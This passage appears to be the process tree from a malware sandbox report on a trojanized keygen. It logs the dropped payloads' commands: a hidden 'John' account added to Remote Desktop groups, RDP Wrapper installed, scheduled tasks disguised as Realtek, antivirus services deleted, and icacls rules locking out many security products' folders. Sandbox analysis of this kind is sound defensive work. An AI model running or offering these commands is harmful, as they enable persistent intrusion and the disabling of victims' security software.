                      net localgroup "Remote Desktop Users" John /add
                      PID:4672
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                        PID:1420
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Usuarios de escritorio remoto" John /add
                      PID:888
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                        PID:1860
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:2180
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                        PID:6132
                    • C:\rdp\RDPWInst.exe
                      "RDPWInst.exe" -i -o
                      PID:5136
                    • C:\rdp\RDPWInst.exe
                      "RDPWInst.exe" -w
                      PID:4928
                    • C:\Windows\SysWOW64\reg.exe
                      reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                      PID:1004
                    • C:\Windows\SysWOW64\net.exe
                      net accounts /maxpwage:unlimited
                      PID:3620
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 accounts /maxpwage:unlimited
                        PID:5756
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                      Views/modifies file attributes
                      PID:3248
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib +s +h "C:\Program Files\RDP Wrapper"
                      Views/modifies file attributes
                      PID:3640
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib +s +h "C:\rdp"
                      Views/modifies file attributes
                      PID:2576
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  Delays execution with timeout.exe
                  PID:4708
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\programdata\microsoft\temp\H.bat
            Drops file in Drivers directory
            PID:3692
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
            Creates scheduled task(s)
            PID:1528
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
            Creates scheduled task(s)
            PID:3908
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
            Creates scheduled task(s)
            PID:2164
          • C:\ProgramData\WindowsTask\update.exe
            C:\ProgramData\WindowsTask\update.exe
            Suspicious use of FindShellTrayWindow
            Suspicious use of SendNotifyMessage
            PID:4948
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
        Creates scheduled task(s)
        PID:1036
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
        Creates scheduled task(s)
        PID:1636
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
        Creates scheduled task(s)
        PID:1520
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
        Creates scheduled task(s)
        PID:1416
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc start appidsvc
        PID:1516
        • C:\Windows\SysWOW64\sc.exe
          sc start appidsvc
          PID:2144
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc start appmgmt
        PID:2060
        • C:\Windows\SysWOW64\sc.exe
          sc start appmgmt
          PID:2152
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
        PID:2172
        • C:\Windows\SysWOW64\sc.exe
          sc config appidsvc start= auto
          PID:2248
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
        PID:2304
        • C:\Windows\SysWOW64\sc.exe
          sc config appmgmt start= auto
          PID:2404
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc delete swprv
        PID:2412
        • C:\Windows\SysWOW64\sc.exe
          sc delete swprv
          PID:2620
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc stop mbamservice
        PID:2652
        • C:\Windows\SysWOW64\sc.exe
          sc stop mbamservice
          PID:2860
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
        PID:2844
        • C:\Windows\SysWOW64\sc.exe
          sc stop bytefenceservice
          PID:2064
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
        PID:2080
        • C:\Windows\SysWOW64\sc.exe
          sc delete bytefenceservice
          PID:1552
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc delete mbamservice
        PID:2560
        • C:\Windows\SysWOW64\sc.exe
          sc delete mbamservice
          PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc delete crmsvc
        PID:2692
        • C:\Windows\SysWOW64\sc.exe
          sc delete crmsvc
          PID:3028
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
        PID:2308
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set allprofiles state on
          PID:2952
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        PID:2868
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          PID:2948
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        PID:2528
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          PID:2968
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        PID:3012
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          PID:3008
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        PID:3056
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          PID:600
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
        PID:3032
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1068
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        PID:2760
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:2988
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
        PID:1332
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:844
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        PID:284
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
        PID:2076
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        PID:1688
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:552
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
        PID:2256
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2576
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        PID:2716
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:2072
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
        PID:1644
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1636
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        PID:2740
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:2044
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
        PID:2476
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1772
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        PID:2764
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:1376
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
        PID:2104
        • C:\Windows\SysWOW64\icacls.exe
          icacls c:\programdata\Malwarebytes /deny Admin:(F)
          Modifies file permissions
          PID:1752
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
        PID:552
        • C:\Windows\SysWOW64\icacls.exe
          icacls c:\programdata\Malwarebytes /deny System:(F)
          Modifies file permissions
          PID:2588
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
        PID:1688
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\MB3Install /deny Admin:(F)
          Modifies file permissions
          PID:2988
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
        PID:2904
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\MB3Install /deny System:(F)
          Modifies file permissions
          PID:2836
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
        PID:800
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1476
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        PID:2864
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          Modifies file permissions
          PID:3040
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
        PID:2552
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2592
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
        PID:2800
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3016
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
        PID:2084
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2532
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        PID:1688
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3028
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
        PID:1376
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2836
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
        PID:1076
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1844
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
        PID:1840
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
        PID:1604
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2112
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
        PID:2084
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2328
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
        PID:2196
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2156
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
        PID:1376
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
        PID:2212
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2844
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
        PID:2976
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2112
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
        PID:1976
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3424
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
        PID:1084
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3480
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
        PID:1376
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3540
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
        PID:1848
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3456
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
        PID:2396
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3704
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        PID:3000
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3616
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
        PID:3188
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3648
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        PID:3204
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3640
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
        PID:3244
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3716
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        PID:3284
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3520
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
        PID:3360
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3652
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        PID:3504
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3488
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
        PID:3684
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3464
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
        PID:3776
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:2672
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
        PID:3876
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1236
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
        PID:3968
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:4060
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
        PID:4056
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:4080
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
        PID:1160
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1880
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
        PID:3200
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:1720
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
        PID:3296
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3236
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
        PID:3768
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3756
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        PID:368
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:564
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
        PID:1520
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3880
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        PID:3188
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
          Modifies file permissions
          PID:3296
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
        PID:3168
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
          Modifies file permissions
          PID:3724
      • C:\Programdata\Install\utorrent.exe
        C:\Programdata\Install\utorrent.exe
        NTFS ADS
        PID:3920
        • C:\ProgramData\WindowsTask\azur.exe
          C:\ProgramData\WindowsTask\azur.exe
          Checks processor information in registry
          PID:4724
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
            PID:1172
            • C:\Windows\SysWOW64\timeout.exe
              C:\Windows\system32\timeout.exe 3
              Delays execution with timeout.exe
              PID:2524
        • C:\ProgramData\WindowsTask\system.exe
          C:\ProgramData\WindowsTask\system.exe
          PID:4860
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\Desktop\selfDel.bat" "
            PID:5880
        • C:\ProgramData\RDPWinst.exe
          C:\ProgramData\RDPWinst.exe -i
          Modifies WinLogon
          PID:2968
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
            PID:1192
      • C:\ProgramData\RealtekHD\taskhost.exe
        C:\ProgramData\RealtekHD\taskhost.exe
        PID:5440
      • C:\ProgramData\RealtekHD\taskhostw.exe
        C:\ProgramData\RealtekHD\taskhostw.exe
        PID:5396
    • C:\Users\Admin\Desktop\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
      "C:\Users\Admin\Desktop\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"
      Executes dropped EXE
      PID:1116
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
        Loads dropped DLL
        PID:2328
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\intro.exe
          intro.exe 1O5ZF
          Executes dropped EXE
          Modifies system certificate store
          PID:2552
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          Executes dropped EXE
          Loads dropped DLL
          PID:2580
          • C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe"
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of SetThreadContext
            PID:1416
            • C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe -txt -scanlocal -file:potato.dat
              Executes dropped EXE
              PID:2624
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
          keygen-step-1.exe
          Executes dropped EXE
          PID:2688
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe
          keygen-step-3.exe
          Executes dropped EXE
          PID:2756
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"
            PID:2872
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              Runs ping.exe
              PID:2164
        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
          keygen-step-4.exe
          Executes dropped EXE
          Loads dropped DLL
          Suspicious behavior: GetForegroundWindowSpam
          PID:2804
          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe"
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:3060
